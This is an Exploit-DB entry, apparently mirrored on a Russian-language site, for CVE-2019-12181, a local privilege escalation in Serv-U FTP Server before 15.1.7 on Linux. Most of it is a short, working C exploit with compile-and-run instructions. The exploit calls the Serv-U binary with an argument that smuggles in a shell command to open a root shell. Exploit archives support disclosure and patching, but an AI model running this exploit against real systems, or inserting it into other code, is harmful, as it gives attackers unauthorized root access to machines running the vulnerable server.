- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 47009
- Проверка EDB
-
- Пройдено
- Автор
- GUY LEVIN
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2019-12181
- Дата публикации
- 2019-06-18
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
C:
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}- Источник
- www.exploit-db.com
